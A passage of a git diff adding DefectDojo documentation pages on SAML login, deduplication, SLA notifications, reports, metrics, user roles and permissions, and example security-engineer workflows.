DD_SAML2_LOGIN_BUTTON_TEXT=(str, 'Login with SAML'), + # If the metadata can be accessed from a url, try the + DD_SAML2_METADATA_AUTO_CONF_URL=(str, ''), + # Otherwise, downlaod a copy of the metadata into an xml file, and + # list the path in DD_SAML2_METADATA_LOCAL_FILE_PATH + DD_SAML2_METADATA_LOCAL_FILE_PATH=(str, '/path/to/your/metadata.xml'), + # Fill in DD_SAML2_ATTRIBUTES_MAP to corresponding SAML2 userprofile attributes provided by your IdP + DD_SAML2_ATTRIBUTES_MAP=(dict, { + # format: SAML attrib:django_user_model + 'Email': 'email', + 'UserName': 'username', + 'Firstname': 'first_name', + 'Lastname': 'last_name' + }), + # May configure the optional fields + {{< /highlight >}} + +NOTE: *DD_SAML2_ATTRIBUTES_MAP* in k8s can be referenced as extraConfig (e.g. `DD_SAML2_ATTRIBUTES_MAP: 'Email'='email', 'Username'='username'...`) + +NOTE: *DD_SITE_URL* might also need to be set depending on the choices you make with the metadata.xml provider. (File versus URL). + +4. Checkout the SAML section in dojo/`dojo/settings/settings.dist.py` and verfiy if it fits your requirement. If you need help, take a look at the [plugin +documentation](https://djangosaml2.readthedocs.io/contents/setup.html#configuration). + +5. Restart DefectDojo, and you should now see a **Login with SAML** button (default setting of DD_SAML2_LOGIN_BUTTON_TEXT) on the login page. + +NOTE: In the case when IDP is configured to use self signed (private) certificate, +than CA needs to be specified by define environments variable +REQUESTS_CA_BUNDLE that points to the path of private CA certificate. + +### Advanced Configuration +The [https://github.com/IdentityPython/djangosaml2](djangosaml2) plugin has a lot of options. For details take a look at the [plugin +documentation](https://djangosaml2.readthedocs.io/contents/setup.html#configuration). All default options in DefectDojo can overwritten in the local_settings.py. If you want to change the organization name, you can add the following lines: + +{{< highlight python >}} +if SAML2_ENABLED: + SAML_CONFIG['contact_person'] = [{ + 'given_name': 'Extra', + 'sur_name': 'Example', + 'company': 'DefectDojo', + 'email_address': 'dummy@defectdojo.com', + 'contact_type': 'technical' + }] + SAML_CONFIG['organization'] = { + 'name': [('DefectDojo', 'en')], + 'display_name': [('DefectDojo', 'en')], + }, +{{< /highlight >}} + +### Migration from django-saml2-auth +Up to relase 1.15.0 the SAML integration was based on [https://github.com/fangli/django-saml2-auth](django-saml2-auth). Which the switch to djangosaml2 some parameters has changed: + +* DD_SAML2_ASSERTION_URL: not necessary any more - automatically generated +* DD_SAML2_DEFAULT_NEXT_URL: not necessary any more - default forwarding from defectdojo is used +* DD_SAML2_NEW_USER_PROFILE: not possible any more - default profile is used, see User Permissions +* DD_SAML2_ATTRIBUTES_MAP: Syntax has changed +* DD_SAML2_CREATE_USER: Default value changed to False, to avoid security breaches + +## User Permissions + +When a new user is created via the social-auth, only the default permissions are active. This means that the newly created user does not have access to add, edit, nor delete anything within DefectDojo. There are two parameters in the System Settings to influence the permissions for newly created users: + +### Default group + +When both the parameters `Default group` and `Default group role` are set, the new user will be a member of the given group with the given role, which will give him the respective permissions. + +### Staff user ### + +Newly created users are neither staff nor superuser by default. The `is_staff` flag of a new user will be set to `True`, if the user's email address matches the regular expression in the parameter `Email pattern for staff users`. + +**Example:** + +`.*@example.com` will make `alice@example.com` a staff user, while `bob@partner.example.com` or `chris@example.org` will be non-staff users. + +## Login speed-up + +You can bypass the login form if you are only using SSO/Social authentication for login in by enabling these two environment variables: + +``` +DD_SOCIAL_LOGIN_AUTO_REDIRECT: "true" +DD_SOCIAL_AUTH_SHOW_LOGIN_FORM: "false" +``` + +### Login form fallback + +If you are using "login speed-up", it can be useful to be able to login by the standard way, for example when an admin +user needs to log in because of a change of some settings or permissions. This feature is accessible by a visiting the URL +`/login?force_login_form`. + + +## Other Providers + +In an effort to accommodate as much generality as possible, it was +decided to implement OAuth2 with the +[social-auth](https://github.com/python-social-auth/social-core/tree/master/social_core/backends) +ecosystem as it has a library of compatible providers with documentation +of implementation. Conveniently, each provider has an identical +procedure of managing the authenticated responses and authorizing access +within a given application. The only difficulty is creating a new +authentication client with a given OAuth2 provider. diff --git a/docs/content/en/integrations/source-code-repositories.md b/docs/content/en/integrations/source-code-repositories.md new file mode 100644 index 00000000000..b8a0f2fe19d --- /dev/null +++ b/docs/content/en/integrations/source-code-repositories.md @@ -0,0 +1,24 @@ +--- +title: "Source code repositories" +description: "Integration of repositories to navigate to the locaction of findings in the source code." +draft: false +weight: 5 +--- + +Findings can have a filepath and a line number as the location of the vulnerability. This is typically set when scanning an application with a Static Application Security Test (SAST) tool. If the repository of the source code is specified in the Engagement, DefectDojo will present the filepath as a link and the user can navigate directly to the location of the vulnerability. + +## Setting the repository in the Engagement + +While editing the Engagement, users can set the URL of the repo. It needs to be the URL including the branch, e.g. https://github.com/DefectDojo/django-DefectDojo/tree/dev (GitHub) or https://gitlab.com/gitlab-org/gitlab/-/tree/master (GitLab). + +![Edit Engagement](../../images/source-code-repositories_1.png) + +## Link in Finding + +When viewing a finding, the location will be presented as a link, if the repository of the source code has been set in the Engagement: + +![Link to location](../../images/source-code-repositories_2.png) + +Clicking on this link will open a new tab in the browser, with the source file of the vulnerability at the corresponding line number: + +![View in repository](../../images/source-code-repositories_3.png) diff --git a/docs/content/en/usage/_index.md b/docs/content/en/usage/_index.md new file mode 100644 index 00000000000..f52244bf4f0 --- /dev/null +++ b/docs/content/en/usage/_index.md @@ -0,0 +1,6 @@ +--- +title: "Usage" +description: "How to use DefectDojo to manage vulnerabilities" +weight: 2 +chapter: true +--- diff --git a/docs/content/en/usage/features.md b/docs/content/en/usage/features.md new file mode 100644 index 00000000000..3b9a9f74444 --- /dev/null +++ b/docs/content/en/usage/features.md @@ -0,0 +1,544 @@ +--- +title: "Features" +description: "Various features help manage the findings." +draft: false +weight: 2 +--- + +## Risk Acceptance + +Findings cannot always be remediated or addressed for various reasons. A +finding status can change to accepted by doing the following. Findings +are accepted in the engagement view. To locate the engagement from the +finding click the link to engagement as shown below. + +![Select an engagement](../../images/select_engagement.png) + +Then, in the engagement view click the plus icon in the \'Risk +Acceptance\' box and fill in the details to support the risk acceptance. + +![Creating a risk acceptance](../../images/risk_exception.png) + +The engagement view is now updated with the risk. + +![Risk Acceptance engagement view](../../images/engagement_risk_acceptance.png) + +The finding status changes to \'Accepted\' with a link to the risk +acceptance. + +![Risk acceptance on finding](../../images/finding_accepted.png) +## Deduplication + +Deduplication is a feature that when enabled will compare +findings to automatically identify duplicates. When +deduplication is enabled, a list of deduplicated findings is added +to the engagement view. The following image illustrates the option +deduplication on engagement and deduplication on product level: + +![Deduplication on product and engagement level](../../images/deduplication.png) + +Upon saving a finding, defectDojo will look at the other findings in the +product or the engagement (depending on the configuration) to find +duplicates + +When a duplicate is found: + +- The newly imported finding takes status: inactive, duplicate +- An \"Original\" link is displayed after the finding status, leading + to the original finding + +There are two ways to use the deduplication: + +Deduplicate vulnerabilities in the same build/release. The vulnerabilities may be found by the same scanner (same scanner deduplication) or by different scanners (cross-scanner deduplication). +: this helps analysis and assessment of the technical debt, + especially if using many different scanners; although + detecting duplicates across scanners is not trivial as it + requires a certain standardization. + +Track unique vulnerabilities across builds/releases so that defectDojo knows when it finds a vulnerability whether it has seen it before. + +: this allows you keep information attached to a given finding + in a unique place: all further duplicate findings will point + to the original one. + +### Deduplication configuration + +#### Global configuration + +The deduplication can be activated in \"System Settings\" by ticking +\"Deduplicate findings\". + +An option to delete duplicates can be found in the same menu, and the +maximum number of duplicates to keep for the same finding can be +configured. + +#### Engagement configuration + +When creating an engagement or later by editing the engagement, the +\"Deduplication within engagement only\" checkbox can be ticked. + +- If activated: Findings are only deduplicated within the same + engagement. Findings present in different engagements cannot be + duplicates +- Else: Findings are deduplicated across the whole product + +Note that deduplication can never occur across different products. + +### Deduplication algorithms + +The behavior of the deduplication can be configured for each parser in +settings.dist.py (or settings.py after install) by configuring the +`DEDUPLICATION_ALGORITHM_PER_PARSER` variable. + +The available algorithms are: + +DEDUPE_ALGO_UNIQUE_ID_FROM_TOOL +: The deduplication occurs based on + finding.unique_id_from_tool which is a unique technical + id existing in the source tool. Few scanners populate this + field currently. If you want to use this algorithm, you may + need to update the scanner code beforehand. + + Advantages: + : - If your source tool has a reliable means of tracking + a unique vulnerability across scans, this + configuration will allow defectDojo to use this + ability. + + Drawbacks: + : - Using this algorithm will not allow cross-scanner + deduplication as other tools will have a different + technical id. + - When the tool evolves, it may change the way the + unique id is generated. In that case you won\'t be + able to recognise that findings found in previous + scans are actually the same as the new findings. + +DEDUPE_ALGO_HASH_CODE +: The deduplication occurs based on finding.hash_code. The + hash_code itself is configurable for each scanner in + parameter `HASHCODE_FIELDS_PER_SCANNER`. + +DEDUPE_ALGO_UNIQUE_ID_FROM_TOOL_OR_HASH_CODE +: A finding is a duplicate with another if they have the same + unique_id_from_tool OR the same hash_code. + + Allows to use both + : - a technical deduplication (based on + unique_id_from_tool) for a reliable same-parser + deduplication + - and a functional one (based on hash_code configured + on CWE+severity+file_path for example) for + cross-parser deduplication + + +DEDUPE_ALGO_LEGACY +: This is algorithm that was in place before the configuration + per parser was made possible, and also the default one for + backward compatibility reasons. + + Legacy algorithm basically deduplicates based on: + : - For static scanner: \[\'title\', \'cwe\', \'line\', + \'file_path\', \'description\'\] + - For dynamic scanner: \[\'title\', \'cwe\', \'line\', + \'file_path\', \'description\', \'endpoints\'\] + + Note that there are some subtleties that may give unexpected + results. Switch + `dojo.specific-loggers.deduplication` to debug + in `settings.py` to get more info in case of trouble. + +### Hash_code computation configuration + +The hash_code computation can be configured for each parser using the +parameter `HASHCODE_FIELDS_PER_SCANNER` in +`settings.dist.py`. + +The parameter `HASHCODE_ALLOWED_FIELDS` list the fields +from finding table that were tested and are known to be working when +used as a hash_code. Don\'t hesitate to enrich this list when required +(the code is generic and allows adding new fields by configuration only) + +Note that `endpoints` isn\'t a field from finding table but +rather a meta value that will trigger a computation based on all the +endpoints. + +When populating `HASHCODE_FIELDS_PER_SCANNER`, please +respect the order of declaration of the fields: use the same order as in +`HASHCODE_ALLOWED_FIELDS`: that will allow cross-scanner +deduplication to function because the hash_code is computed as a +sha-256 of concatenated values of the configured fields. + +Tips: + +- It\'s advised to use fields that are standardized for a reliable + deduplication, especially if aiming at cross-scanner deduplication. + For example `title` and `description` tend + to change when the tools evolve and don\'t allow cross-scanner + deduplication + + Good candidates are + : - `cwe` or `cve` + - Adding the severity will make sure the deduplication won\'t + be to aggressive (there are several families of XSS and sql + injection for example, with various severities but the same + cwe). + - Adding the file_path or endpoints is advised too. + +- The parameter `HASHCODE_ALLOWS_NULL_CWE` will allow + switching to legacy algorithm when a null cwe is found for a given + finding: this is to avoid getting many duplicates when the tool + fails to give a cwe while we are expecting it. + +### Hashcode generation / regeneration + +When you change the hashcode configuration, it is needed to regenerated the hashcodes for all findings, +or at least those findings found by scanners for which the configuration was updated. + +This is sometimes also needed after an upgrade to a new Defect Dojo version, for example when we made changes +to the hashcode configuration or calculation logic. We will mention this in the upgrade notes. + +To regenerate the hashcodes, use the `dedupe` management command: + +{{< highlight bash >}} +docker-compose exec uwsgi ./manage.py dedupe --hash_code_only +{{< / highlight >}} + +This will only regenerated the hashcodes, but will not run any deduplication logic on existing findings. +If you want to run deduplication again on existing findings to make sure any duplicates found by the new +hashcode config are marked as such, run + +{{< highlight bash >}} +docker-compose exec uwsgi ./manage.py dedupe +{{< / highlight >}} + +The deduplication part of this command will run the deduplication for each finding in a celery task. If you want to +run the deduplication in the foreground process, use: + +{{< highlight bash >}} +docker-compose exec uwsgi ./manage.py dedupe --dedupe_sync +{{< / highlight >}} + +Please note the deduplication process is resource intensive and can take a long time to complete +(estimated ~7500 findings per minute when run in the foreground) + + +### Debugging deduplication + +There is a specific logger that can be activated in order to have +details about the deduplication process : switch +`dojo.specific-loggers.deduplication` to debug in +`settings.dist.py`. + +### Deduplication - APIv2 parameters + +- `skip_duplicates`: if true, duplicates are not + inserted at all +- `close_old_findings` : if true, findings that are not + duplicates and that were in the previous scan of the same type + (example ZAP) for the same product (or engagement in case of + \"Deduplication on engagement\") and that are not present in the new + scan are closed (Inactive, Verified, Mitigated) + +### Deduplication / Similar findings + +Similar Findings Visualization: + +![Similar findings list](../../images/similar_finding_1.png) + +![Similar findings list with a duplicate](../../images/similar_finding_2.png) + +Similar Findings +: While viewing a finding, similar findings within the same product + are listed along with buttons to mark one finding a duplicate of the + other. Clicking the \"Use as original\" button on a similar finding + will mark that finding as the original while marking the viewed + finding as a duplicate. Clicking the \"Mark as duplicate\" button on + a similar finding will mark that finding as a duplicate of the + viewed finding. If a similar finding is already marked as a + duplicate, then a \"Reset duplicate status\" button is shown instead + which will remove the duplicate status on that finding along with + marking it active again. + +## False Positive Removal + +DefectDojo allows users to tune out false positives by enabling False +Positive History. This will track what engineers have labeled as false +positive for a specific product and for a specific scanner. While +enabled, when a tool reports the same issue that has been flagged as a +false positive previously, it will automatically mark the finding as a +false positive, helping to tune overly verbose security tools. + +False Positive Removal is not needed when using deduplication, and it is +advised to not combine these two. + +## Service Level Agreement (SLA) + +DefectDojo allows you to maintain your security SLA and automatically +remind teams whenever a SLA is about to get breached, or breaches. + +Simply indicate in the `System Settings` for each severity, how many +days teams have to remediate a finding. + +![SLA configuration screen](../../images/sla_global_settings.png) + +### SLA notification configuration + +There are 5 variables in the settings.py file that you can configure, to +act on the global behavior. By default, any findings across the instance +that are in `Active, Verified` state will be considered for +notifications. + +{{< highlight python >}} +SLA_NOTIFY_ACTIVE = False +SLA_NOTIFY_ACTIVE_VERIFIED_ONLY = True +SLA_NOTIFY_WITH_JIRA_ONLY = False +SLA_NOTIFY_PRE_BREACH = 3 +SLA_NOTIFY_POST_BREACH = 7 +{{< / highlight >}} + +Setting both `SLA_NOTIFY_ACTIVE` and `SLA_NOTIFY_ACTIVE_VERIFIED_ONLY` +to `False` will effectively disable SLA notifications. + +You can choose to only consider findings that have a JIRA issue linked +to them. If so, please set `SLA_NOTIFY_WITH_JIRA_ONLY` to `True`. + +The `SLA_NOTIFY_PRE_BREACH` is expressed in days. Whenever a finding\'s +\"SLA countdown\" (time to remediate) drops to this number, a +notification would be sent everyday, as scheduled by the crontab in +`settings.py`, until the day it breaches. + +The `SLA_NOTIFY_POST_BREACH` lets you define in days how long you want +to be kept notified about findings that have breached the SLA. Passed +that number, notifications will cease. + +{{% alert title="Warning" color="warning" %}} +Be mindful of performance if you choose to have SLA notifications on +non-verified findings, especially if you import a lot of findings +through CI in \'active\' state. +{{% /alert %}} + + +### What notification channels for SLA notifications? + +The same as usual. You will notice that an extra `SLA breach` option is now present +on the `Notification` page and also in the `Product` view. + +![SLA notification checkbox](../../images/sla_notification_product_checkboxes.png) + +### SLA notification with JIRA + +You can choose to also send SLA notification as JIRA comments, if your +product is configured with JIRA. You can enable it at the JIRA +configuration level or at the Product level. + +The Product level JIRA notification configuration takes precendence over +the global JIRA notification configuration. + +### When is the SLA notification job run? + +The default setup will trigger the SLA notification code at 7:30am on a +daily basis, as defined in the `settings.py` file. You can of course +modify this schedule to your context. + +{{< highlight python >}} +'compute-sla-age-and-notify': { + 'task': 'dojo.tasks.async_sla_compute_and_notify', + 'schedule': crontab(hour=7, minute=30), +} +{{< / highlight >}} + +{{% alert title="Information" color="info" %}} +The celery containers are the ones concerned with this configuration. If +you suspect things are not working as expected, make sure they have the +latest version of your settings.py file. +{{% /alert %}} + + +You can of course change this default by modifying that stanza. + +### Launching from the CLI + +You can also invoke the SLA notification function from the CLI. For +example, if run from docker-compose: + +{{< highlight bash >}} +$ docker-compose exec uwsgi /bin/bash -c 'python manage.py sla_notifications' +{{< / highlight >}} + +## Reports + +### Instant reports + +![Report Listing](../../images/report_1.png) + +Instant reports can be generated for: + +1. Product types +2. Products +3. Engagements +4. Tests +5. List of Findings +6. Endpoints + +Filtering is available on all report generation views to aid in focusing the report for the appropriate need. + +### Custom reports + +![Report Generation](../../images/report_2.png) + +Custom reports, generated with the Report Builder, allow you to select specific components to be added to the report. These include: + +1. Cover Page +2. Table of Contents +3. WYSIWYG Content +4. Findings +5. Vulnerable Endpoints +6. Page Breaks + +DefectDojo's reports can be generated in HTML and AsciiDoc. + +## Metrics + +DefectDojo provides a number of metrics visualization in order to help +with reporting, awareness and to be able to quickly communicate a +products/product type\'s security stance. + +The following metric views are provided: + +Product Type Metrics +: This view provides graphs displaying Open Bug Count by Month, + Accepted Bug Count by Month, Open Bug Count by Week, Accepted Bug + Count by Week as well as tabular data on Top 10 Products by bug + severity, Detail Breakdown of all reported findings, Opened + Findings, Accepted Findings, Closed Findings, Trending Open Bug + Count, Trending Accepted Bug Count, and Age of Issues. + + ![Product Type Metrics](../../images/met_1.png) + +Product Type Counts +: This view provides tabular data of Total Current Security Bug Count, + Total Security Bugs Opened In Period, Total Security Bugs Closed In + Period, Trending Total Bug Count By Month, Top 10 By Bug Severity, + and Open Findings. This view works great for communication with + stakeholders as it is a snapshot in time of the product. + + ![Product Type Counts](../../images/met_2.png) + +Simple Metrics +: Provides tabular data for all Product Types. The data displayed in + this view is the total number of S0, S1, S2, S3, S4, Opened This + Month, and Closed This Month. + + ![Simple Metrics](../../images/met_3.png) + +Engineer Metrics +: Provides graphs displaying information about a tester\'s activity. + + ![Simple Metrics](../../images/met_4.png) + +Metrics Dashboard +: Provides a full screen, auto scroll view with many metrics in graph + format. This view is great for large displays or \"Dashboards.\" + + ![Metrics Dashboard](../../images/met_5.png) + +## Users + +DefectDojo users inherit from +[django.contrib.auth.models.User](https://docs.djangoproject.com/en/3.1/topics/auth/default/#user-objects). + +A username, first name, last name, and email address can be associated +with each user. Additionally the following attributes describe the type of users: + +Active +: Designates whether this user should be treated as active and can login to DefectDojo. + Unselect this instead of deleting accounts. + +Staff status +: Staff users have some more permissions than non-staff users, see [System wide permissions]({{< ref "permissions#system-wide-permissions" >}}) + +Superuser status +: Designates that this user can configure the system and has all permissions + for objects without explicitly assigning them. + +A superuser may force a password reset for any user at any given time. This +can be set when creating a new user, or when editing an existing one, requiring +the user to change their password upon their next login. + +DefectDojo enforces the following password rules for all users: +* Must meet a length requirement of 9 characters +* Must be unique (not commonly used) +* Must contain one of each of the following: a number (0-9), uppercase letter + (A-Z), lowercase letter (a-z), and symbol ()[]{}|\~!@#$%^&*_-+=;:`'",<>./? + +## Calendar + +The calendar view provides a look at all the engagements and tests occurring +during the month d, week or day displayed. Each entry is a direct link to the +respective engagement or test view page. + +## Benchmarks + +![OWASP ASVS Benchmarks](../../images/owasp_asvs.png) + +DefectDojo utilizes the OWASP ASVS Benchmarks to benchmark a product to +ensure the product meets your application technical security controls. +Benchmarks can be defined per the organizations policy for secure +development and multiple benchmarks can be applied to a product. + +Benchmarks are available from the Product view. To view the configured +benchmarks select the dropdown menu from the right hand drop down menu. +You will find the selection near the bottom of the menu entitled: +\'OWASP ASVS v.3.1\'. + +![OWASP ASVS Benchmarks Menu](../../images/owasp_asvs_menu.png) + +In the Benchmarks view for each product, the default level is ASVS Level +1. On the top right hand side the drop down can be changed to the +desired ASVS level (Level 1, Level 2 or Level 3). The publish checkbox +will display the ASVS score on the product page and in the future this +will be applied to reporting. + +![OWASP ASVS Score](../../images/owasp_asvs_score.png) + +On the left hand side the ASVS score is displayed with the desired +score, the % of benchmarks passed to achieve the score and the total +enabled benchmarks for that AVSV level. + +Additional benchmarks can be added/updated in the Django admin site. In +a future release this will be brought out to the UI. + +## Endpoint Meta Importer + +For heavy infrastructure scanning organizations, endpoints need to be as +flexible as possible to get the most of DefectDojo. This flexibility comes +in the form of Tags and custom fields. Tags allow users to filter, sort, and +report objects in ways the base object is not totally proficient in doing. + +Endpoint Meta Importer provides a means to apply arbitrary tags and custom fields to +endpoints in mass via a CSV file. Tags and customs fields are stored in the +format of column:row. + +Here is a very simple example with only two columns: + +``` +hostname | team | public_facing +------------------------------------------------------------------ +sheets.google.com | data analytics | yes +docs.google.com | language processing | yes +feedback.internal.google.com | human resources | no +``` + +The three endpoints hosts will be used to find existing endpoints with matching hosts, +or create new endpoints, and then apply meta as follows: + +``` +sheets.google.com (endpoint) -> [ team:data analytics, public_facing:yes ] (tags) +docs.google.com (endpoint) -> [ team:language processing, public_facing:yes ] (tags) +feedback.internal.google.com (endpoint) -> [ team:human resources, public_facing:no ] (tags) +``` + +Endpoint Meta Importer can be found in the Endpoint tab when viewing a Product + +**Note:** The field "hostname" is required as it is used to query/create endpoints. \ No newline at end of file diff --git a/docs/content/en/usage/models.md b/docs/content/en/usage/models.md new file mode 100644 index 00000000000..b02c8c3b3bb --- /dev/null +++ b/docs/content/en/usage/models.md @@ -0,0 +1,77 @@ +--- +title: "Core data classes" +description: "DefectDojo is based on a model that allows high flexibility for your test tracking needs." +draft: false +weight: 1 +--- + +![Data Model](../../images/DD-Hierarchy.svg) + +## Product Type + +Product types represent the top level model, these can be business unit +divisions, different offices or locations, development teams, or any +other logical way of distinguishing "types" of products. + +Examples: +: - IAM Team + - Internal / 3rd Party + - Main company / Acquisition + - San Francisco / New York offices + +## Product + +This is the name of any project, program, or product that you are +currently testing. + +Examples: +: - Wordpress + - Internal wiki + - Slack + +## Engagement + +Engagements are moments in time when testing is taking place. They are +associated with a name for easy reference, a time line, a lead (the user +account of the main person conducting the testing), a test strategy, and +a status. Engagement consists of two types: Interactive and CI/CD. An +interactive engagement is typically an engagement conducted by an +engineer, where findings are usually uploaded by the engineer. A CI/CD +engagement, as it's name suggests, is for automated integration with a +CI/CD pipeline. + +Examples: +: - Beta + - Quarterly PCI Scan + - Release Version X + +## Test + +Tests are a grouping of activities conducted by engineers to attempt to +discover flaws in a product. Tests are bundled within engagements, have a +start and end date and are defined by a test type. + +Examples: +: - Burp Scan from Oct. 29, 2015 to Oct. 29, 2015 + - Nessus Scan from Oct. 31, 2015 to Oct. 31, 2015 + - API Test from Oct. 15, 2015 to Oct. 20, 2015 + +## Finding + +A finding represents a flaw discovered while testing. It can be +categorized with severities of Critical, High, Medium, Low, and +Informational (Info). + +Examples: +: - OpenSSL 'ChangeCipherSpec' MiTM Potential Vulnerability + - Web Application Potentially Vulnerable to Clickjacking + - Web Browser XSS Protection Not Enabled + +## Endpoint + +Endpoints represent testable systems defined by their IP address or Fully Qualified Domain Name. + +Examples: +: - https://www.example.com + - https://www.example.com:8080/products + - 192.168.0.36 diff --git a/docs/content/en/usage/performance.md b/docs/content/en/usage/performance.md new file mode 100644 index 00000000000..66c304feb65 --- /dev/null +++ b/docs/content/en/usage/performance.md @@ -0,0 +1,40 @@ +--- +title: "Performance Enhancements" +description: "Settings to configure to enhance performance in DefectDojo" +draft: false +weight: 4 +--- + +## Asynchronous Import + +DefectDojo offers an experimental feature to aynschronously import security reports. +This feature works in most use cases, but struggles when doing things such as pushing +to Jira during the import process. Because Endpoints are still being processed and +created even after the import procedure is completed, pushing Findings to Jira can +result in incomplete Jira tickets. It is advised to wait until after import has been +completed 100%. + +To enable this feature, set `ASYNC_FINDING_IMPORT` to True in `local_settings.py` + +## Asynchronous Delete + +For larger instances, deleting an object can take minutes for all related objects to be +expanded into memory, rendered on the page, and then removing all objects from the database. +To combat this issue, two settings can be set in `local_settings.py`: + +#### ASYNC_OBJECT_DELETE + +Deleting an object asynchronously changes the way an object is deleted under the hood. By removing +the need to expand into memory, a lot of time (and memory) can be saved by offloading the lookups and +removals onto celery processes. This process works by starting at the bottom of a given object, and +walking the tree upwards rather than downwards. This way, objects can be seperated into buckets, +and then deleted. + +#### DELETE_PREVIEW + +Previewing all the objects to be deleted takes almost as much time as deleting the objects itself. +This is a safety feature intended to warn users of what they are about to delete, as well as educating +users of how the delete functionality works by cascade deleting all related objects. With this feature enabled, +the user will only see the following text in the delete preview (without any database lookups) + +`Previewing the relationships has been disabled.` diff --git a/docs/content/en/usage/permissions.md b/docs/content/en/usage/permissions.md new file mode 100644 index 00000000000..2b29616a32c --- /dev/null +++ b/docs/content/en/usage/permissions.md @@ -0,0 +1,127 @@ +--- +title: "Permissions" +description: "Users have different functionality available to them, depending on their system-wide permissions and on the role they have as a member of a particular Product or Product Type." +weight: 3 +draft: false +--- + +## System-wide permissions + +* Administrators (aka superusers) have no limitations in the system. They can change all settings, manage users and have read and write access to all data. +* Staff users can add Product Types, and have access to data according to their role in a Product or Product Type. +* Regular users have limited functionality available. They cannot add Product Types but have access to data according to their role in a Product or Product Type + +## Product and Product Type permissions + +Users can be assigned as members to Products and Product Types, giving them one out of five predefined roles. The role defines what kind of access a user has to functions for interacting with data of that Product or Product Type: + +**Product / Product Type roles:** + +| | Reader | Writer | Maintainer | Owner | API Importer | +|-----------------------------|:------:|:------:|:----------:|:-----:|:------------:| +| Add Product Type | | | 1) |1) | | +| View Product Type | x | x | x | x | x | +| Remove yourself as a member | x | x | x | x | | +| Manage Product Type members | | | x | x | | +| Edit Product Type | | | x | x | | +| Add Product | | | x | x | | +| Add Product Type member as Owner | | | | x | | +| Delete Product Type | | | | x | | +| | | | | | | +| View Product | x | x | x | x | x | +| Remove yourself as a member | x | x | x | x | | +| Manage Product members | | | x | x | | +| Edit Product | | | x | x | | +| Add Product member as Owner | | | | x | | +| Delete Product | | | | x | | +| | | | | | | +| View Engagement | x | x | x | x | x | +| Add Engagement | | x | x | x | | +| Edit Engagement | | x | x | x | | +| Risk Acceptance | | x | x | x | | +| Delete Engagement | | | x | x | | +| | | | | | | +| View Test | x | x | x | x | x | +| Add Test | | x | x | x | | +| Edit Test | | x | x | x | | +| Delete Test | | | x | x | | +| | | | | | | +| View Finding | x | x | x | x | x | +| Add Finding | | x | x | x | | +| Edit Finding | | x | x | x | | +| (Re-)Import Scan Result | | x | x | x | x | +| Delete Finding | | | x | x | | +| | | | | | | +| View Finding Group | x | x | x | x | x | +| Add Finding Group | | x | x | x | | +| Edit Finding Group | | x | x | x | | +| Delete Finding Group | | x | x | x | | +| | | | | | | +| View Endpoint | x | x | x | x | x | +| Add Endpoint | | x | x | x | | +| Edit Endpoint | | x | x | x | | +| Delete Endpoint | | | x | x | | +| | | | | | | +| Edit Benchmark | | x | x | x | | +| Delete Benchmark | | | x | x | | +| | | | | | | +| View Components | x | x | x | x | x | +| | | | | | | +| View Note History | x | x | x | x | | +| Add Note | x | x | x | x | | +| Edit Note | (x) 2) | x | x | x | | +| Delete Note | (x) 2) | (x) 2) | x | x | | + + +1) Every staff user and administrator can add Product Types. Regular users are not allowed to add Product Types, unless they are Global Owner or Maintainer. + +2) Every user is allowed to edit and delete his own notes. + +The role of a user within a Product Type is inherited by all Products of that Product Type, unless the user is explicitly defined as a member of a Product with a different role. In that case, if a user doesn't have a certain right for the Product Type, it is then checked if he has the right for the Product. + +A Product Type needs to have at least one owner. The last owner cannot be removed. + +## Global permissions + +Users can be assigned a global role in the *Edit User* dialog. A global role gives a user access to all Product Types and Products, including the underlying data, with permissions according to the respective role. + +A use case for a global role could be the Chief Information Security Officer of a company who needs an overview of all systems. If he gets the global role `Reader`, he can see the findings for all products and also all metrics. + +Since global roles give users access to all data, only superusers are allowed to edit it. + +## Groups ## + +If you have a number of users who should all have the same permissions for some Products or Product Types, you can put them together in a group. The group defines the roles for Products and Product Types that are applied to all members of the group. + +The membership of a group itself has a role that determines what permissions the member has to manage the group: + +| | Reader | Maintainer | Owner | +|-----------------------------|:------:|:----------:|:-----:| +| Add Group 1) | | | | +| View Group | x | x | x | +| Remove yourself as a member | x | x | x | +| Manage Group members | | x | x | +| Edit Group | | x | x | +| Add Group member as Owner | | | x | +| Delete Group | | | x | + +1) Every staff user and administrator can add groups. Regular users are not allowed to add groups. + +The permissions to manage the roles of Products and Product types for a group is defined by the role of the user in the respective Product or Product Type. + +Groups can have a global role too. This global role gives all members of the group access to all Product Types and Products, including the underlying data, with permissions according to the respective role. + +## Configuration permissions + +Release 2.7.0 contains a beta functionality to make permissions for the configuration of DefectDojo more flexible. When the settings parameter `FEATURE_CONFIGURATION_AUTHORIZATION` is set to `True`, many configuration dialogues and API endpoints can be enabled for users or groups of users, regardless of their **Superuser** or **Staff** status: + +![Configuration permissions](../../images/configuration_permissions.png) + +3 configurations can still only be changed by superusers: +* System settings +* Notifications on system level +* Configuration permissions for users and groups + +{{% alert title="Warning" color="warning" %}} +These configuration settings are a powerful tool and should be used with great care. +{{% /alert %}} diff --git a/docs/content/en/usage/workflows.md b/docs/content/en/usage/workflows.md new file mode 100644 index 00000000000..62882ba8352 --- /dev/null +++ b/docs/content/en/usage/workflows.md @@ -0,0 +1,63 @@ +--- +title: "Example workflows" +description: "Two examples how DefectDojo can be used in day-to-day operations." +draft: false +weight: 4 +--- + + +Example 1 - Bill the security engineer +-------------------------------------- + +Bill wants a place to keep track of what he\'s worked on, so that he can +show his boss exactly what issues he reports, and statistics about how +long it takes to close them. + +When he is asked to audit an application, Bill registers a new Product +in DefectDojo, and creates a new Engagement. Here he sets some basic +information, like how long he expects the Engagement will take, who will +be leading the testing (himself), what Product he will be working on, +and what tests he will be doing. + +Next, he can add a Test to the Engagement, or upload a Nessus scan and +start picking out the real vulnerabilities from the false positives +(Nessus scan Findings are imported as inactive by default). + +Within the Test section, Bill can add Findings for any issues that he +has uncovered during his audit. He can assign a severity to the +Findings, describe replication steps, mitigation strategies, and impact +on the system. This will come in handy when he wants to generate a +report to send to the development team responsible for this Product, or +his manager. + +Once Bill has completed his Engagement, he can close the Engagement on +the main Engagement page. He can then view the results of his Tests, and +generate a report to send to the development team. + +If Bill hears back from the development team that they won\'t be able to +fix the issue for a while, he can make a note of this on the Engagement +page. Bill will also receive Alerts for any bugs that persist longer +than they are supposed to based on their severity. + +Example 2 - John the QE manager +------------------------------- + +John wants to keep tabs on what his team members are up to, and find +issues that are taking a long time to get fixed. He creates his own +DefectDojo account with superuser privileges so that he can view other +team members\' metrics. + +To get a better idea of what his team members are currently working on, +he can start by checking the Calendar. This will show him any active +Engagements that his team is involved in, based on the dates assigned to +those Engagements. 